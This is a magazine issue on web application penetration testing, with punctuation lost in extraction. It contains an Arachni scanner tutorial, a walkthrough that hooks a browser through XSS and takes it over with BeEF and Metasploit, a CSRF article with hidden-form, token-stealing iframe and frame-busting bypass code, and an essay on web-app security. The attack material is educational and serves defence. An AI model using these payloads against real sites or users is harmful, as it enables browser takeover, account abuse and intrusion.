The asynchronous scanning engine supports both HTTP and HTTPS and has pauseresume functionality Arachni supports upstream proxies (for SOCKS4 SOCKS4A SOCKS5 HTTP11 and HTTP10) as well as proxy authentication
The scanner can authenticate versus the web application using form-based authentication HTTP Basic and Digest Authentication and NTLM
At the start of every scan a crawler will try to detect all pages In version 03 this was optional but since version 04 the crawler will always be run at the start of the scan This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions Optionally the crawler can also follow subdomains There is also an adjustable link count and redirect limit
The HTML parser can extract forms links cookies and headers It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser
Arachni offers a very simple and easy to use module API enabling a developer to access helper audit methods and writing custom modules in a matter of minutes Arachni already includes a large number of modules audit modules and reconnaissance (recon) modules Table 1 provides an overview
Arachni offers report management The following reports can be created standard output HTML XML TXT YAML serialization and the Metareport providing Metasploit integration for automated and assisted exploitation
Arachni has many build-in plug-ins that have direct access to the framework instance Plug-ins can be used to add any functionality to Arachni Table 2 provides an overview of currently available plug-ins
InstallationArachni consists of client-side (web or shell) and server-side functionality (the dispatchers) A client
Table 2 Included Arachni plug-ins Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-insPassive Proxy Analyses requests and responses
between the web application and the browser assisting in AJAX audits logging-in andor restricting the scope of the audit
Form based AutoLogin Performs an automated login
Dictionary attacker Performs dictionary attacks against HTTP Authentication and Forms based authentication
Proler Performs taint analysis with benign inputs and response time analysis
Cookie collector Keeps track of cookies while establishing a timeline of the changes
Healthmap Generates a sitemap showing the health (vulnerability present or not) of each crawledaudited URL
Content-types Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les
WAF (Web Application Firewall) Detector
Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
Metamodules Loads and runs high-level meta-analysis modules premidpost-scanAutoThrottle Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilizationTimeoutNotice Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processingUniformity Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Letrsquos get our hands dirty and start with the experimental branch (currently at version 04) so we can work with the latest and greatest functionality Another benefit is that this experimental version can work under Windows
Installation under Linux is quick and easy but a Windows set-up requires the installation of Cygwin first Cygwin is a collection of tools that provide a Linux-like environment on Windows as well as providing a large part of Linux APIs Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that
LinuxInstallation under Linux is quite straightforward Open your favourite shell and execute the following commands Listing 1
This will install all source directories in your home directory Change all the cd commands if you want the sources somewhere else In case you need an update to the latest versions just cd into the three directories above and perform
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni If you encounter a Typhoeus related error while running Arachni issue
$ gem clean
WindowsArachni comes with decent documentation but I had a chuckle when I read the installation instructions for Windows Windows users should run Arachni in Cygwin I knew that this was not going to be a smooth ride Since v03 some changes have been made to the experimental version to make it easier so here we go
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setupexe Apart from the standard packages include the following
bull Database libsqlite3-devel libsql3_0bull Devel doxygen libffi4 gcc4 gcc4-core gcc4-g++
git libxml2 libxml2-devel make openssl-develbull Editors nanobull Libs libxslt libxslt-devel libopenssl098 tcltk
libxml2 libmpfr4bull Net libcurl-devel libcurl4
Listing 1 Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev
libcurl4-openssl-dev libsqlite3-
dev
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ $ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
